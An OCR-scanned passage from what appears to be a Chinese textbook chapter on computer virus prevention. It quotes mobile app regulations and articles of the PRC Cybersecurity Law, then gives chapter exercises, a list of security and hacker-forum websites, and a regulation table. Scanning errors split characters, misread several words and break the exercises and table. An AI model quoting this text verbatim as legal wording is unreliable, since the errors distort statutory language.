必要 的 原则 ,明示 收集 使 用 信息 的 目的 、 方 式 和 范围 ,并 经 用 户 同 意 。 

(三 ) 建立 健全 信息 内 容 审 核 管 理 机 制 , 对 发 布 违法 违规 信息 内 容 的 , 视 情 采取 警示 、 限 
制 功能 ,暂停 更 新 、 关 闭 账号 等 处 置 措施 ,保存 记录 并 向 有 关 主 管 部 门 报告 。 

(四 ) 依法 保障 用 户 在 安装 或 使 用 过 程 中 的 知情 权 和 选择 权 , 未 向 用 户 明 示 并 经 用 户 同 
意 ,不 得 开启 收集 地 理 位 置 、 读 取 通 讯 录 、 使 用 摄像 头 、 启 用 录音 等 功能 ,不 得 开启 与 服务 无 
关 的 功能 ,不 得 捆绑 安装 无 关 应 用 程序 。 

(五 ) 尊重 和 保护 知识 产权 ,不 得 制作 ,发布 侵 犯 他 人 知识 产权 的 应 用 程序 。 

(六 ) 记录 用 户 日 志 信息 ,并 保存 六 十 日 。 

第 八条 互联 网 应 用 商店 服务 提供 者 应 当 对 应 用 程序 提供 者 履行 以 下 管理 责任 : 

(一 ) 对 应 用 程序 提供 者 进行 真实 性 、 安 全 性 ,合法 性 等 审核 ,建立 信用 管理 制度 ,并 向 
所 在 地 省 、 自 治 区 、 直 辖 市 互联 网 信息 办 公 室 分 类 备案 。 

(二 ) 督促 应 用 程序 提供 者 保护 用 户 信息 ,完整 提供 应 用 程序 获取 和 使 用 用 户 信息 的 说 
明 ,并 向 用 户 呈 现 。 

(三 ) 督促 应 用 程序 提供 者 发 布 合法 信息 内 容 , 建 立 健全 安全 审核 机 制 , 配 备 与 服务 规 
模 相 适应 的 专业 人 员 。 

(四 ) 督促 应 用 程序 提供 者 发 布 合法 应 用 程序 ,尊重 和 保护 应 用 程序 提供 者 的 知识 
产权 。 

对 违反 前 款 规 定 的 应 用 程序 提供 者 , 视 情 采取 警示 、 和 暂停 发 布 、 下 架 应 用 程序 等 措施 , 保 
存 记录 并 向 有 关 主 管 部 门 报告 。 

第 九条 互联 网 应 用 商店 服务 提供 者 和 移动 互联 网 应 用 程序 提供 者 应 当 签 订 服 务 协 
议 ,明确 双方 权利 义务 ,共同 遵守 法 律 法 规 和 平台 公约 。 

第 十 条 ”移动 互联 网 应 用 程序 提供 者 和 互联 网 应 用 商店 服务 提供 者 应 当 配合 有 关 部 门 
依法 进行 的 监督 检查 ,自觉 接受 社会 监督 ,设置 便捷 的 投诉 举报 入 口 ,及 时 处 理 公众 投诉 
举报 。 

第 十 一 条 ”本 规定 自 2016 年 8 月 1 日 起 施行 。 

11. 中 华人 民 共 和 国 网 络 安全 法 

2016 年 11 月 7 日 ,十 二 届 全 国人 大 常委 会 第 二 十 四 次 会 议 表 决 通过 (中华 人民 共 和 国 
网 络 安 全 法 (以 下 简称 《网络 安全 法 )) ,并 于 2017 年 6 月 1 日 起 施行 。 《网络 安全 法 ) 是 为 
保障 网 络 安全 ,维护 网 络 空间 主权 和 国家 安全 ,社会 公共 利益 ,保护 公民 、 法 人 和 其 他 组 织 的 
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合法 权益 ,促进 经 济 社会 信息 化 健康 发 展 制定 的 ,共有 7 章 79 条 ,具有 六 大 突出 亮点 。 一 是 
明确 网 络 空间 主权 的 原则 ; 二 是 明确 网 络 产品 和 服务 提供 者 的 安全 义务 ; 三 是 明确 网 络 运 
营 者 的 安全 义务 ; 四 是 进一步 完善 个 人 信息 保护 规则 ; 五 是 建立 关键 信息 基础 设施 安全 保 
护 制度 ; 六 是 确立 关键 信息 基础 设施 重要 数据 跨 境 传输 的 规则 。 

(2016 年 11 月 7 日 第 十 二 届 全 国人 民 代 表 大 会 常务 委员 会 第 二 十 四 次 会 议 通过 , 自 
2017 年 6 月 1 日 起 施行 ) 

第 五 条 ”国家 采取 措施 ,监测 防御、 处 置 来 源 于 中 华人 民 共 和 国境 内 外 的 网 络 安全 风 
险 和 威胁 ,保护 关键 信息 基础 设施 免 受 攻击 、 侵 入 ,干扰 和 破坏 ,依法 惩治 网 络 违法 犯罪 活 
动 ,维护 网 络 空间 安全 和 秩序 。 

第 二 十 一 条 ”国家 实行 网 络 安全 等 级 保护 制度 。 网 络 运营 者 应 当 按照 网 络 安全 等 级 保 
护 制 度 的 要 求 ,履行 下 列 安全 保护 义务 ,保障 网 络 免 受 干扰 、 破 坏 或 者 未 经 授权 的 访问 ,防止 
网 络 数据 泄露 或 者 被 窃取 、 算 改 : 

(一 ) 制定 内 部 安全 管理 制度 和 操作 规程 ,确定 网 络 安全 负责 人 ,落实 网 络 安全 保护 责任 ; 

(二 ) 采取 防范 计算 机 病毒 和 网 络 攻击 .网络 入侵 等 危害 网 络 安全 行为 的 技术 措施 ; 

(三 ) 采取 记录 、 跟 踪 网 络 运行 状态 ,监测 .记录 网 络 安全 事件 的 技术 措施 ,并 按照 规定 
留存 网 络 日 志 ; 

(四 ) 采取 数据 分 类 ,重要 数据 备份 和 加 密 等 措施 ; 

(五 ) 法 律 , 行 政法 规 规定 的 其 他 义务 。 

网 络 安全 等 级 保护 的 具体 办 法 由 国务 院 规定 。 

第 二 十 二 条 ”网 络 产 品 、 服 务 应 当 符合 相关 国家 标准 的 强制 性 要 求 。 网 络 产 品 、 服 务 的 
提供 者 不 得 设置 恶意 程序 ; 发 现 其 网 络 产 品 、 服 务 存在 安全 缺陷 漏洞 等 风险 时 ,应 当 立 即 
采取 补救 措施 ,按照 规定 及 时 告知 用 户 并 向 有 关 主 管 部 门 报告 。 

第 二 十 五 条 ”网 络 运营 者 应 当 制 定 网 络 安全 事件 应 急 预 案 , 及 时 处 置 系统 漏洞 计算 机 
病毒 ,网 络 攻击 .网络 侵 入 等 安全 风险 ; 在 发 生 危 害 网 络 安全 的 事件 时 ,立即 启动 应 急 预 案 ， 
采取 相应 的 补救 措施 ,并 按照 规定 向 有 关 主 管 部 门 报告 。 

第 二 十 六 条 ”开展 网 络 安全 认证 ,检测 、 风 险 评估 等 活动 ,向 社会 发 布 系 统 漏洞 计算 机 
病毒 、 网 络 攻 击 、 网 络 侵 入 等 网 络 安全 信息 ,应当 遵守 国家 有 关 规 定 。 

第 二 十 七 条 任何 个 人 和 组 织 不 得 从 事 非法 侵入 他 人 网 络 .干扰 他 人 网 络 正 常 功能 、 窃 
取 网 络 数据 等 危害 网 络 安全 的 活动 ; 不 得 提供 专门 用 于 从 事 侵入 网 络 \ 干 扰 网 络 正常 功能 
及 防护 措施 、 窃 取 网 络 数据 等 危害 网 络 安全 活动 的 程序 、 工 具 ; 明知 他 人 从 事 危 害 网 络 安全 
活动 的 ,不 得 为 其 提供 技术 支持 \ 广 告 推广 ,支付 结算 等 帮助 。 

第 四 十 六 条 ”任何 个 人 和 组 织 应 当 对 其 使 用 网 络 的 行为 负责 ,不 得 设立 用 于 实施 诈骗 ， 
传授 犯罪 方法 ,制作 或 者 销售 违禁 物品 管制 物品 等 违法 犯罪 活动 的 网 站 、 通 信和 群 组 ,不 得 利 
用 网 络 发 布 涉及 实施 诈骗 ,制作 或 者 销售 违禁 物品 \ 管 制 物品 以 及 其 他 违法 犯罪 活动 的 
信息 。 

第 四 十 七 条 ”网 络 运营 者 应 当 加 强 对 其 用 户 发 布 的 信息 的 管理 ,发 现 法 律 \ 行 政法 规 禁 
止 发 布 或 者 传输 的 信息 的 ,应 当 立 即 停止 传输 该 信息 ,采取 消除 等 处 置 措施 ,防止 信息 扩散 ， 
保存 有 关 记 录 ,并 向 有 关 主 管 部 门 报告 

第 四 十 八条 ”任何 个 人 和 组 织 发 送 的 电子 信息 、 提 供 的 应 用 软件 ,不 得 设置 恶意 程序 ， 
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不 得 含有 法 律 ` 行 政法 规 禁 止 发 布 或 者 传输 的 信息 。 

电子 信息 发 送 服务 提供 者 和 应 用 软件 下 载 服务 提供 者 ,应 当 履 行 安全 管理 义务 ,知道 其 
用 户 有 前 款 规 定 行为 的 ,应 当 停止 提供 服务 ,采取 消除 等 处 置 措施 ,保存 有 关 记 录 ,并 向 有 关 
主管 部 门 报告 。 

第 四 十 九条 网 络 运营 者 应 当 建立 网 络 信息 安全 投诉 、 举 报 制度 ,公布 投诉 、 举 报 方式 
等 信息 ,及 时 受理 并 处 理 有 关 网 络 信息 安全 的 投诉 和 举报 。 

第 五 十 条 ”国家 网 信 部 门 和 有 关 部 门 依法 履行 网 络 信息 安全 监督 管理 职责 ,发现 法 律 、 
行政 法 规 禁 止 发 布 或 者 传输 的 信息 的 ,应 当 要 求 网 络 运营 者 停止 传输 ,采取 消除 等 处 置 措 
施 ,保存 有 关 记 录 ; 对 来 源 于 中 华人 民 共 和 国境 外 的 上 述 信息 ,应 当 通知 有 关机 构 采取 技术 
措施 和 其 他 必要 措施 阻 断 传播 。 

第 六 十 二 ”条 违反 本 法 第 二 十 六 条 规定 ,开展 网 络 安全 认证 ,检测 、 风 险 评 估 等 活动 ,或 
者 向 社会 发 布 系统 漏洞 .计算 机 病毒 .网络 攻击 、 网 络 侵入 等 网 络 安全 信息 的 ,由 有 关 主 管 部 
门 责令 改正 ,给 予 警告 ; 拒 不 改正 或 者 情节 严重 的 ,处 一 万 元 以 上 十 万 元 以 下 罚款 ,并 可 以 
由 有 关 主 管 部 门 责令 暂停 相关 业务 ,停业 整顿 ,关闭 网 站 、 帅 销 相 关 业 务 许可 证 或 者 吊销 营 
业 执 照 ,对 直接 负责 的 主管 人 员 和 其 他 直接 责任 人 员 处 五 千 元 以 上 五 万 元 以 下 罚款 。 

第 六 十 三 条 ”违反 本 法 第 二 十 七 条 规定 ,从 事 危 害 网 络 安全 的 活动 ,或 者 提供 专门 用 于 
从 事 危 害 网 络 安全 活动 的 程序 .工具 ,或 者 为 他 人 从 事 危害 网 络 安全 的 活动 提供 技术 支持 、 
广告 推广 ,支付 结算 等 帮助 , 尚 不 构成 犯罪 的 ,由 公安 机 关 没 收 违法 所 得 ,处 五 日 以 下 拘留 ， 
可 以 并 处 五 万 元 以 上 五 十 万 元 以 下 罚款 ; 情节 较 重 的 ,处 五 日 以 上 十 五 日 以 下 拘留 ,可 以 并 
处 十 万 元 以 上 一 百 万 元 以 下 罚款 。 

单位 有 前 款 行为 的 ,由 公安 机 关 没 收 违法 所 得 ,处 十 万 元 以 上 一 百 万 元 以 下 罚款 ,并 对 
直接 负责 的 主管 人 员 和 其 他 直接 责任 人 员 依 照 前 款 规 定 处 罚 。 

违反 本 法 第 二 十 七 条 规定 ,受到 治安 管理 处 罚 的 人 员 ,五 年 内 不 得 从 事 网 络 安全 管理 和 
网 络 运营 关键 岗位 的 工作 ; 受到 刑事 处 罚 的 人 员 ,终身 不 得 从 事 网 络 安全 管理 和 网 络 运营 
关键 岗位 的 工作 。 

第 六 十 七 条 ”违反 本 法 第 四 十 六 条 规定 ,设立 用 于 实施 违法 犯罪 活动 的 网 站 、 通 信和 群 
组 ,或 者 利用 网 络 发 布 涉及 实施 违法 犯罪 活动 的 信息 , 尚 不 构成 犯罪 的 ,由 公安 机 关 处 五 日 
以 下 拘留 ,可 以 并 处 一 万 元 以 上 十 万 元 以 下 罚款 ; 情节 较 重 的 ,处 五 日 以 上 十 五 日 以 下 拘 
留 ,可 以 并 处 五 万 元 以 上 五 十 万 元 以 下 罚款 。 关 闭 用 于 实施 违法 犯罪 活动 的 网 站 、 通 信 
群 组 。 

单位 有 前 款 行为 的 ,由 公安 机 关 处 十 万 元 以 上 五 十 万 元 以 下 罚款 ,并 对 直接 负责 的 主管 
人 员 和 其 他 直接 责任 人 员 依 照 前 款 规 定 处 罚 。 

第 六 十 八条 ”网 络 运营 者 违反 本 法 第 四 十 七 条 规定 ,对 法 律 、 行 政法 规 禁止 发 布 或 者 传 
输 的 信息 未 停止 传输 、 采 取消 除 等 处 置 措施 、 保 存 有 关 记 录 的 ,由 有 关 主 管 部 门 责令 改正 ,给 
予 警告 ,没收 违法 所 得 ; 拒 不 改正 或 者 情节 严重 的 ,处 十 万 元 以 上 五 十 万 元 以 下 罚款 ,并 可 
以 责令 暂停 相关 业务 、 停 业 整 顿 , 关 闭 网 站 、 帅 销 相关 业务 许可 证 或 者 吊销 营业 执照 ,对 直接 
负责 的 主管 人 员 和 其 他 直接 责任 人 员 处 一 万 元 以 上 十 万 元 以 下 罚款 。 

电子 信息 发 送 服务 提供 者 ,应 用 软件 下 载 服务 提供 者 ,不 履行 本 法 第 四 十 八条 第 二 款 规 
定 的 安全 管理 义务 的 ,依照 前 款 规定 处 罚 。 
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第 七 十 一 条 ”有 本 法 规定 的 违法 行为 的 ,依照 有 关 法 律 ,行政 法 规 的 规定 记 入 信用 档 
案 , 并 予以 公示 。 


12.8 习 题 
一 、 填空 题 
1. 从 恶意 代码 对 抗 的 角度 来 看 ,病毒 防治 策略 必须 具备 下 列 准 则 : 
8 和 替代 操作 。 

,十 二 届 全 国人 大 常委 会 第 二 十 四 次 会 议 表 决 通过 (中 华人 民 共 和 国 
网 络 安全 法 ), 并 于 起 施行 。 

二 、 选择 题 

下 列 ( ) 是 不 正确 的 。 

A. 不 存在 能 够 防治 未 来 所 有 病毒 的 反 病 毒 软 \ 硬 件 

B. 现在 的 杀毒 软件 能 够 查 杀 未 知 病 毒 

C. 恶意 代码 产生 在 前 ,安全 手段 相对 滞后 

D. 数据 备份 是 防治 数据 丢失 的 重要 手段 

三 、 思 考题 

1. 结合 本 书 所 学 知识 , 谈 谈 对 “不 存在 能 够 防治 未 来 所 有 病毒 的 反 病毒 软 、 硬 件 ” 这 和 句 
话 的 理解 和 认识 。 


2. 论述 计算 机 病毒 防治 策略 在 防范 计算 机 病毒 中 的 作用 。 

3. 结合 实例 (历史 或 身边 ) , 谈 谈 对 违反 信息 安全 法 律 法 规 的 一 些 认识 。 
4. 试 讨论 如 何 才 能 够 真正 地 做 到 防范 未 来 计算 机 病毒 人 侵 或 破坏 。 
5. 制订 一 份 企 业 病毒 防范 策略 需要 考虑 哪些 步骤 ? 

四 、 实 操 题 

结合 12. 4.4 节 的 内 容 , 熟 悉 其 中 一 种 恶意 代码 “额外 防范 工具 ”。 


附录 A 计算 机 病毒 相关 网 上 资源 


1. WildList 国际 组 织 

http://www. wildlist. org 

该 网 站 的 内 容 为 在 世界 各 地 发 现 的 病毒 列表 。 负 责 维护 这 个 列表 ,并 且 按 月 打包 供用 
户 下 载 。 此 外 ,网 站 上 还 有 一 些 计算 机 病毒 方面 的 学 术 论 文 。 

2. 病毒 公告 牌 

http://www. virusbtn. com 

对 于 任何 关心 恶意 代码 和 垃圾 信息 防护 检测 和 清除 的 人 来 说 ,病毒 公告 在 线 杂 志 是 一 
个 必 不 可 少 的 参考 。 病 毒 公告 牌 逐日 逐 月 地 提供 如 下 信息 。 

(1) 来 自 于 反 恶 意 代码 业界 的 发 人 深 省 的 新 闻 和 观点 。 

(2) 最 新 恶意 代码 威胁 的 详细 分 析 。 

(3) 探索 反 恶 意 代码 技术 开发 的 长 篇 文档 。 

(4) 反 恶 意 代 码 专 家 的 会 见 。 

(5) 对 当前 反 病毒 产品 的 独立 评测 。 

(6) 覆盖 垃圾 邮件 和 反 垃 圾 邮件 技术 的 月 报 。 

3. 卡 饭 论坛 

http://bbs. kafan. cn 

卡 饭 的 意思 是 卡巴 斯 基 的 FANS( 爱 好 者 ) , 取 其 谐音 , 即 为 卡 饭 。 卡 饭 论坛 最 初 是 一 个 
以 卡巴 斯 基 爱 好 者 为 主体 ,以 计算 机 安全 软件 为 主要 内 容 的 论坛 。 随 着 国产 计算 机 安全 软 
件 的 兴起 , 卡 饭 论 坛 对 主流 的 计算 机 安全 软件 均 有 不 同 程度 的 涉及 ,迄今 为 止 已 发 展 成 为 最 
大 的 计算 机 安全 论坛 之 一 。 论 坛 的 开放 时 间 是 2006 年 6 月 1 日 。 

4. 亚洲 反 病 毒 研究 者 协会 (AVAR) 

http://www. aavar. org 

AVAR( 亚 洲 反 病毒 研究 者 协会 ) 成 立 于 1998 年 6 月 。 协 会 的 宗旨 是 预防 计算 机 病毒 
的 传播 和 破坏 ,促进 亚洲 的 反 病毒 研究 者 间 建 立 良好 的 合作 关系 。 该 协会 是 独立 的 , 非 营 利 
性 组 织 , 主 要 面向 的 对 象 是 亚太 地 区 。 本 协会 有 来 自 澳大利亚 、 中 国 、 印 度 \ 日 本 、 韩 国 、 非 律 
宾 、 新 加 坡 、 英 国 、 美 国 等 国家 的 资深 反 病毒 专家 。 其 独立 性 保证 了 能 在 对 抗 计算 机 病毒 的 
过 程 中 发 挥 重要 的 作用 ,同时 提醒 人 们 对 计算 机 安全 的 警惕 性 。AVAR 的 主要 工作 如 下 。 

(1) 组 织 和 承办 以 反 病毒 为 主题 的 AVAR 年 会 和 论坛 。 

(2) 在 AVAR 网 站 上 提供 亚洲 的 计算 机 病毒 事件 的 信息 。 

(3) 通过 邮件 的 形式 在 AVAR 的 成 员 中 建立 邮件 列表 ,并 在 会 员 中 交换 意见 与 信息 。 

5. 国家 计算 机 病毒 应 急 处 理 中 心 


http://www. antivirus-china. org. cn 
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该 网 站 主要 内 容 包 括 病毒 流行 列表 、 病 毒 SOS 求救 和 数据 恢复 等 。 

6. 病毒 观察 

http://www. virusview. net 

该 网 站 主要 内 容 包 括 病毒 预报 新闻、 评论 .相关 法 规 . 反 病毒 资料 .安全 漏洞 、 密 码 知 识 
和 病毒 百科 在 线 检 索 等 。 

7. HACK80 

www. hack80. com 

HACK80 是 集 黑 客 技术 交流 .黑客 工具 分 享 的 黑客 论坛 。 与 传统 黑客 联盟 不 同 , 该 论 
坛 在 守法 的 前 提 下 提倡 自由 的 技术 交流 ,力求 成 为 一 个 气氛 优秀 的 技术 圈子 。 

8. 安全 焦点 

http://www. xfocus. net 

安全 焦点 是 中 国 目 前 顶级 的 网 络 安 全 站 点 ,那里 集聚 的 一 大 批 知 名 的 黑客 。 网 站 内 容 
包括 安全 论文 .安全 工具 ,安全 漏洞 及 逆向 技术 等 。 

9. 看 雪 论 坛 

https: //bbs. pediy. com/ 

看 雪 论 坛 是 致力 于 PC 移动 、 物 联网 安全 研究 及 逆向 工程 相关 的 开发 者 社区 。 网 站 主 
要 内 容 包 括 黑 客 频道 防毒 技巧 网络 安全 新 闻 和 病毒 新 闻 等 。 

10. 国际 计算 机 安全 联合 会 (International Computer Secwrity Association ,ICSA) 

http://www. icsa. com/ 

如 果 对 Internet 的 安全 问题 感 兴趣 ,可 以 访问 国家 计算 机 安全 联合 会 (NCSA) 的 站 点 。 
这 里 会 看 到 很 多 关于 国家 计算 机 安全 联合 会 各 种 活动 的 信息 ,包括 会 议 、 培 训 、 产 品 认证 和 
安全 警告 等 ,可 以 了 解 到 国际 知名 的 病毒 防治 软件 登记 情况 。 


附录 B 相关 法 律 法 规 


中 国信 息 安全 部 分 法 规 概览 表 
法 规 名 称 发 布 机 构 份 
中 华人 民 共 和 国 计 算 机 信息 系统 安全 保护 条 例 国务 院 1994 
中 国 公用 计算 机 互联 网 国际 联网 管理 办 法 邮电 部 1996 
计算 机 信息 网 络 国际 联网 出 入 口 信道 管理 办 法 邮电 部 1996 
中 华人 民 共 和 国 计 算 机 信息 网 络 国际 联网 管理 暂 国务 院 po 


行规 定 


计算 机 信息 系统 安全 专用 产品 检测 和 销售 许可 证 
管理 办 法 


1997 


计算 机 信息 网 络 国际 联网 安全 保护 管理 办 法 


公安 部 


1997 


中 华人 民 共 和 国 计 算 机 信息 网 络 国际 联网 管理 暂 
行规 定 实施 办 法 


1998 


商用 密码 管理 条 例 国务 院 1999 
计算 机 病毒 防治 管理 办 法 公安 部 2000 
A 全 国人 大 常委 会 i 
互联 网 信息 服务 管理 办 法 国务 院 2000 
计算 机 信息 系统 国际 联网 保密 管理 规定 国家 保密 局 2000 
信息 产业 部 、 公 安 部 、 文 化 部 、 国 
互联 网 上 网 服务 营业 场所 管理 办 法 寄 工 商行 政 管理 局 2001 
计算 机 软件 保护 条 例 国务 院 2001 
互联 网 上 网 服务 营业 场所 管理 条 例 国务 院 2002 
中 华人 民 共 和 国电 子 签名 法 全 国人 大 常委 会 2004 
互联 网 安全 保护 技术 措施 规定 公安 部 2005 
信息 网 络 传播 权 保 护 条 例 国务 院 2006 
公安 部 .国家 保密 局 、 国 家 密码 管 
信息 安全 等 级 保护 管理 办 法 理 局 ,国务 院 信息 化 工作 办 公 室 2007 
电子 认证 服务 管理 办 法 工业 和 信息 化 部 2009 
电子 认证 服务 密码 管理 办 法 国家 密码 管理 局 2009 
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续 表 
法 规 名 称 发 布 机 构 份 

ee 全 国人 大 常委 会 
移动 互联 网 应 用 程序 信息 服务 管理 规定 国家 互联 网 信息 办 公 室 2016 
中 华人 民 共 和 国 网 络 安全 法 全 国人 大 常委 会 2016 
网 络 产品 和 服务 安全 审查 办 法 (试行 ) 国家 互联 网 信息 办 公 室 2017 
互联 网 信息 内 容 管理 行政 执法 程序 规定 国家 互联 网 信息 办 公 室 2017 
互联 网 新 闻 信息 服务 管理 规定 国家 互联 网 信息 办 公 室 2017 
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